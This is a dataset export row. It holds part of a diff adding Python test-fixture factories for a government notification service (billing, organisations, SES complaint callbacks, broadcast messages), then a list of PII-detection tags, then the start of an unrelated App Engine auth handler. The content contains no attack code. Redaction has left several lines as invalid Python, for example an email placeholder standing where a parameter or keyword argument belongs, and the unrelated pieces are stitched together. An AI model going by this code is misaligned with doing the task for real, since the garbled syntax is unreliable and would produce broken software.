EmailBranding(**data) + dao_create_email_branding(email_branding) + + return email_branding + + +def create_rate(start_date, value, notification_type): + rate = Rate( + id=uuid.uuid4(), + valid_from=start_date, + rate=value, + notification_type=notification_type + ) + db.session.add(rate) + db.session.commit() + return rate + + +def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'): + if start_date is None: + start_date = datetime(2016, 1, 1) + rate = LetterRate( + id=uuid.uuid4(), + start_date=start_date, + end_date=end_date, + crown=crown, + sheet_count=sheet_count, + rate=rate, + post_class=post_class + ) + db.session.add(rate) + db.session.commit() + return rate + + +def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None): + id_ = uuid.uuid4() + + name = key_name if key_name else '{} api key {}'.format(key_type, id_) + + api_key = ApiKey( + service=service, + name=name, + created_by=service.created_by, + key_type=key_type, + id=id_, + secret=uuid.uuid4() + ) + db.session.add(api_key) + db.session.commit() + return api_key + + +def create_inbound_number(number, provider='mmg', active=True, service_id=None): + inbound_number = InboundNumber( + id=uuid.uuid4(), + number=number, + provider=provider, + active=active, + service_id=service_id + ) + db.session.add(inbound_number) + db.session.commit() + return inbound_number + + +def create_reply_to_email( + service, + email_address, + is_default=True, + archived=False +): + data = { + 'service': service, + 'email_address': email_address, + 'is_default': is_default, + 'archived': archived, + } + reply_to = ServiceEmailReplyTo(**data) + + db.session.add(reply_to) + db.session.commit() + + return reply_to + + +def create_service_sms_sender( + service, + sms_sender, + is_default=True, + inbound_number_id=None, + archived=False +): + data = { + 'service_id': service.id, + 'sms_sender': sms_sender, + 'is_default': is_default, + 'inbound_number_id': inbound_number_id, + 'archived': archived, + } + service_sms_sender = ServiceSmsSender(**data) + + db.session.add(service_sms_sender) + db.session.commit() + + return service_sms_sender + + +def create_letter_contact( + service, + contact_block, + is_default=True, + archived=False +): + data = { + 'service': service, + 'contact_block': contact_block, + 'is_default': is_default, + 'archived': archived, + } + letter_content = ServiceLetterContact(**data) + + db.session.add(letter_content) + db.session.commit() + + return letter_content + + +def create_annual_billing( + service_id, free_sms_fragment_limit, financial_year_start +): + annual_billing = AnnualBilling( + service_id=service_id, + free_sms_fragment_limit=free_sms_fragment_limit, + financial_year_start=financial_year_start + ) + db.session.add(annual_billing) + db.session.commit() + + return annual_billing + + +def create_domain(domain, organisation_id): + + domain = Domain(domain=domain, organisation_id=organisation_id) + + db.session.add(domain) + db.session.commit() + + return domain + + +def create_organisation( + name='test_org_1', + active=True, + organisation_type=None, + domains=None, + organisation_id=None, + purchase_order_number=None, + billing_contact_names=None, + billing_contact_email_addresses=None, + billing_reference=None, +): + data = { + 'id': organisation_id, + 'name': name, + 'active': active, + 'organisation_type': organisation_type, + 'purchase_order_number': purchase_order_number, + 'billing_contact_names': billing_contact_names, + 'billing_contact_email_addresses': billing_contact_email_addresses, + 'billing_reference': billing_reference, + } + organisation = Organisation(**data) + dao_create_organisation(organisation) + + for domain in domains or []: + create_domain(domain, organisation.id) + + return organisation + + +def create_invited_org_user(organisation, invited_by, dummy@email.com'): + invited_org_user = InvitedOrganisationUser( + email_address=email_address, + invited_by=invited_by, + organisation=organisation, + ) + save_invited_org_user(invited_org_user) + return invited_org_user + + +def create_daily_sorted_letter(billing_day=None, + file_name=""Notify-20180118123.rs.txt"", + unsorted_count=0, + sorted_count=0): + daily_sorted_letter = DailySortedLetter( + billing_day=billing_day or date(2018, 1, 18), + file_name=file_name, + unsorted_count=unsorted_count, + sorted_count=sorted_count + ) + + db.session.add(daily_sorted_letter) + db.session.commit() + + return daily_sorted_letter + + +def create_ft_billing(bst_date, + template, + *, + provider='test', + rate_multiplier=1, + international=False, + rate=0, + billable_unit=1, + notifications_sent=1, + postage='none' + ): + data = FactBilling(bst_date=bst_date, + service_id=template.service_id, + template_id=template.id, + notification_type=template.template_type, + provider=provider, + rate_multiplier=rate_multiplier, + international=international, + rate=rate, + billable_units=billable_unit, + notifications_sent=notifications_sent, + postage=postage) + db.session.add(data) + db.session.commit() + return data + + +def create_ft_notification_status( + bst_date, + notification_type='sms', + service=None, + template=None, + job=None, + key_type='normal', + notification_status='delivered', + count=1 +): + if job: + template = job.template + if template: + service = template.service + notification_type = template.template_type + else: + if not service: + service = create_service() + template = create_template(service=service, template_type=notification_type) + + data = FactNotificationStatus( + bst_date=bst_date, + template_id=template.id, + service_id=service.id, + job_id=job.id if job else uuid.UUID(int=0), + notification_type=notification_type, + key_type=key_type, + notification_status=notification_status, + notification_count=count + ) + db.session.add(data) + db.session.commit() + return data + + +def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34): + data = FactProcessingTime( + bst_date=bst_date, + messages_total=messages_total, + messages_within_10_secs=messages_within_10_secs + ) + fact_processing_time_dao.insert_update_processing_time(data) + + +def create_service_guest_list(service, email_address=None, mobile_number=None): + if email_address: + guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address) + elif mobile_number: + guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number) + else: + guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com') + + db.session.add(guest_list_user) + db.session.commit() + return guest_list_user + + +def create_complaint(service=None, + notification=None, + created_at=None): + if not service: + service = create_service() + if not notification: + template = create_template(service=service, template_type='email') + notification = create_notification(template=template) + + complaint = Complaint(notification_id=notification.id, + service_id=service.id, + ses_feedback_id=str(uuid.uuid4()), + complaint_type='abuse', + complaint_date=datetime.utcnow(), + created_at=created_at if created_at else datetime.now() + ) + db.session.add(complaint) + db.session.commit() + return complaint + + +def ses_complaint_callback_malformed_message_id(): + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def ses_complaint_callback_with_missing_complaint_type(): + """""" + https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object + """""" + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def ses_complaint_callback(): + """""" + https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object + """""" + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def ses_notification_callback(): + return '{\n ""Type"" : ""Notification"",\n ""MessageId"" : ""ref1"",' \ + '\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",' \ + '\n ""Message"" : ""{\\""notificationType\\"":\\""Delivery\\"",' \ + '\\""mail\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:25.909Z\\"",' \ + '\\""source\\"":dummy@email.com"",' \ + '\\""sourceArn\\"":\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\"",' \ + '\\""sendingAccountId\\"":\\""123456789012\\"",' \ + '\\""messageId\\"":\\""ref1\\"",' \ + '\\""destination\\"":dummy@email.com""]},' \ + '\\""delivery\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:26.567Z\\"",' \ + '\\""processingTimeMillis\\"":658,' \ + '\\""recipients\\"":dummy@email.com""],' \ + '\\""smtpResponse\\"":\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\"",' \ + '\\""reportingMTA\\"":\\""a6-238.smtp-out.eu-west-1.amazonses.com\\""}}"",' \ + '\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\n ""SignatureVersion"" : ""1"",' \ + '\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \ + 'PI:KEY' \ + 'PI:KEY' \ + 'PI:KEY"",' \ + '\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \ + 'dd426d95ee9390147a5624348ee.pem"",' \ + '\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \ + 'PI:KEY""\n}' + + +def create_service_data_retention( + service, + notification_type='sms', + days_of_retention=3 +): + data_retention = insert_service_data_retention( + service_id=service.id, + notification_type=notification_type, + days_of_retention=days_of_retention + ) + return data_retention + + +def create_invited_user(service=None, + to_email_address=None): + + if service is None: + service = create_service() + if to_email_address is None: + to_email_address = dummy@email.com' + + from_user = service.users[0] + + data = { + 'service': service, + 'email_address': to_email_address, + 'from_user': from_user, + 'permissions': 'send_messages,manage_service,manage_api_keys', + 'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())] + } + invited_user = InvitedUser(**data) + save_invited_user(invited_user) + return invited_user + + +def create_template_folder(service, name='foo', parent=None): + tf = TemplateFolder(name=name, service=service, parent=parent) + db.session.add(tf) + db.session.commit() + return tf + + +def create_letter_branding(name='HM Government', filename='hm-government'): + test_domain_branding = LetterBranding(name=name, + filename=filename, + ) + db.session.add(test_domain_branding) + db.session.commit() + return test_domain_branding + + +def set_up_usage_data(start_date): + year = int(start_date.strftime('%Y')) + one_week_earlier = start_date - timedelta(days=7) + two_days_later = start_date + timedelta(days=2) + one_week_later = start_date + timedelta(days=7) + one_month_later = start_date + timedelta(days=31) + + # service with sms and letters: + service_1_sms_and_letter = create_service( + service_name='a - with sms and letter', + purchase_order_number=""service purchase order number"", + billing_contact_names=""service billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""service billing reference"" + ) + letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter') + sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms') + create_annual_billing( + service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year + ) + org_1 = create_organisation( + name=""Org for {}"".format(service_1_sms_and_letter.name), + purchase_order_number=""org1 purchase order number"", + billing_contact_names=""org1 billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""org1 billing reference"" + ) + dao_add_service_to_organisation( + service=service_1_sms_and_letter, + organisation_id=org_1.id + ) + + create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11) + create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11) + create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11) + + create_ft_billing(bst_date=one_week_later, template=letter_template_1, + notifications_sent=2, billable_unit=1, rate=.35, postage='first') + create_ft_billing(bst_date=one_month_later, template=letter_template_1, + notifications_sent=4, billable_unit=2, rate=.45, postage='second') + create_ft_billing(bst_date=one_week_later, template=letter_template_1, + notifications_sent=2, billable_unit=2, rate=.45, postage='second') + + # service with emails only: + service_with_emails = create_service(service_name='b - emails') + email_template = create_template(service=service_with_emails, template_type='email') + org_2 = create_organisation( + name='Org for {}'.format(service_with_emails.name), + ) + dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id) + + create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10) + + # service with letters: + service_with_letters = create_service(service_name='c - letters only') + letter_template_3 = create_template(service=service_with_letters, template_type='letter') + org_for_service_with_letters = create_organisation( + name=""Org for {}"".format(service_with_letters.name), + purchase_order_number=""org3 purchase order number"", + billing_contact_names=""org3 billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""org3 billing reference"" + ) + dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id) + + create_ft_billing(bst_date=start_date, template=letter_template_3, + notifications_sent=2, billable_unit=3, rate=.50, postage='first') + create_ft_billing(bst_date=one_week_later, template=letter_template_3, + notifications_sent=8, billable_unit=5, rate=.65, postage='second') + create_ft_billing(bst_date=one_month_later, template=letter_template_3, + notifications_sent=12, billable_unit=5, rate=.65, postage='second') + + # service with letters, without an organisation: + service_with_letters_without_org = create_service(service_name='d - service without org') + letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter') + + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=8, billable_unit=4, rate=1.55, postage='europe') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=2, billable_unit=1, rate=.35, postage='second') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=1, billable_unit=1, rate=.50, postage='first') + + # service with chargeable SMS, without an organisation + service_with_sms_without_org = create_service( + service_name='b - chargeable sms', + purchase_order_number=""sms purchase order number"", + billing_contact_names=""sms billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""sms billing reference"" + ) + sms_template = create_template(service=service_with_sms_without_org, template_type='sms') + create_annual_billing( + service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year + ) + create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12) + create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11) + create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11) + + # service with SMS within free allowance + service_with_sms_within_allowance = create_service( + service_name='e - sms within allowance' + ) + sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms') + create_annual_billing( + service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year + ) + create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11) + + # dictionary with services and orgs to return + return { + ""org_1"": org_1, + ""service_1_sms_and_letter"": service_1_sms_and_letter, + ""org_2"": org_2, + ""service_with_emails"": service_with_emails, + ""org_for_service_with_letters"": org_for_service_with_letters, + ""service_with_letters"": service_with_letters, + ""service_with_letters_without_org"": service_with_letters_without_org, + ""service_with_sms_without_org"": service_with_sms_without_org, + ""service_with_sms_within_allowance"": service_with_sms_within_allowance, + } + + +def create_returned_letter(service=None, reported_at=None, notification_id=None): + if not service: + service = create_service(service_name='a - with sms and letter') + returned_letter = ReturnedLetter( + service_id=service.id, + reported_at=reported_at or datetime.utcnow(), + notification_id=notification_id or uuid.uuid4(), + created_at=datetime.utcnow(), + ) + + db.session.add(returned_letter) + db.session.commit() + return returned_letter + + +def create_service_contact_list( + service=None, + original_file_name='EmergencyContactList.xls', + row_count=100, + template_type='email', + created_by_id=None, + archived=False, +): + if not service: + service = create_service(service_name='service for contact list', user=create_user()) + + contact_list = ServiceContactList( + service_id=service.id, + original_file_name=original_file_name, + row_count=row_count, + template_type=template_type, + created_by_id=created_by_id or service.users[0].id, + created_at=datetime.utcnow(), + archived=archived, + ) + db.session.add(contact_list) + db.session.commit() + return contact_list + + +def create_broadcast_message( + template=None, + *, + service=None, # only used if template is not provided + created_by=None, + personalisation=None, + content=None, + status=BroadcastStatusType.DRAFT, + starts_at=None, + finishes_at=None, + areas=None, + stubbed=False +): + if template: + service = template.service + template_id = template.id + template_version = template.version + personalisation = personalisation or {} + content = template._as_utils_template_with_personalisation( + personalisation + ).content_with_placeholders_filled_in + elif content: + template_id = None + template_version = None + personalisation = None + content = content + else: + pytest.fail('Provide template or content') + + broadcast_message = BroadcastMessage( + service_id=service.id, + template_id=template_id, + template_version=template_version, + personalisation=personalisation, + status=status, + starts_at=starts_at, + finishes_at=finishes_at, + created_by_id=created_by.id if created_by else service.created_by_id, + areas=areas or {'areas': [], 'simple_polygons': []}, + content=content, + stubbed=stubbed + ) + db.session.add(broadcast_message) + db.session.commit() + return broadcast_message + + +def create_broadcast_event( + broadcast_message, + sent_at=None, + message_type='alert', + transmitted_content=None, + transmitted_areas=None, + transmitted_sender=None, + transmitted_starts_at=None, + transmitted_finishes_at=None, +): + b_e = BroadcastEvent( + service=broadcast_message.service, + broadcast_message=broadcast_message, + sent_at=sent_at or datetime.utcnow(), + message_type=message_type, + transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'}, + transmitted_areas=transmitted_areas or broadcast_message.areas, + transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk', + transmitted_starts_at=transmitted_starts_at, + transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24), + ) + db.session.add(b_e) + db.session.commit() + return b_e + + +def create_broadcast_provider_message( + broadcast_event, + provider, + status='sending' +): + broadcast_provider_message_id = uuid.uuid4() + provider_message = BroadcastProviderMessage( + id=broadcast_provider_message_id, + broadcast_event=broadcast_event, + provider=provider, + status=status, + ) + db.session.add(provider_message) + db.session.commit() + + provider_message_number = None + if provider == BroadcastProvider.VODAFONE: + provider_message_number = BroadcastProviderMessageNumber( + broadcast_provider_message_id=broadcast_provider_message_id) + db.session.add(provider_message_number) + db.session.commit() + return provider_message + + +def create_webauthn_credential( + user, + name='my key', + *, + credential_data='ABC123', + registration_response='DEF456', +): + webauthn_credential = WebauthnCredential( + user=user, + name=name, + credential_data=credential_data, + registration_response=registration_response + ) + + db.session.add(webauthn_credential) + db.session.commit() + return webauthn_credential +",41713,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'""], ['URL', ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'""], ['DATE_TIME', 'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', ""post_class='second""], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', ""provider='mmg""], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', ""2018-06-05T14:00:15.952Z'""], ['DATE_TIME', '2016-03-14T12:35:26.665Z"",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letter.id'], ['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', '2.id'], ['URL', 'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']]" +100,"# -*- coding: utf-8 -*- + + +import os +import uuid +import datetime +from google.appengine.ext import webapp +from google.appengine.api import users +from google.appengine.ext import db +from google.appengine.api import mail +from google.appengine.ext.webapp import template + +from django.utils import simplejson as json +from google.appengine.api import urlfetch +import urllib + +import conf +import app.FlyingClub +import app.CoreHandler +from app.models import Comment, Crew + + + + +class AuthHandler(webapp.RequestHandler): + + + ################################################################################################### + ## Get Actions + ################################################################################################### + def get(self, section=None, page=None): + + #sessID = self.do_cookie_check() + section = 'auth' + template_vars = {} + App = app.FlyingClub.FlyingClub(section, page) + template_vars['app'] = App + + #tvars['appo'] = Appo + #tvars['conf'] = conf + #tvars['user'] = None + #template_vars['crewID'] = crewID + #f 'sessIdent' in self.request.cookies: + #sessIdent = self.request.cookies['sessIdent'] + #lse: + # sessIdent = None + + ## Setup Section and Page + #if section == None: + #section = ""index"" + #template_vars['section'] = section + #template_vars['page'] = page + + + ## Get Comments + q = db.GqlQuery(""SELECT * FROM Comment "" + + ""WHERE section = :1 "" + + ""ORDER BY dated DESC"", + section) + results = q.fetch(50) + #template_vars['comments'] = results + + ## Application Object + + #template_vars['page_title'] = Appo.title(""/%s/"" % section) + + + ## Setup User + Aauth + #user = users.get_current_user() + #if not user: + # template_vars['user'] = None + # template_vars['login_url'] = users.create_login_url(""/set_session/"") + #else: + # template_vars['user'] = user + # template_vars['logout_url'] = users.create_logout_url(""/subscribe/"") + + + ## Sign In Section + #if section == 'ssignin' : + # if sessID: + # self.redirect(""/profile/"") + # return + 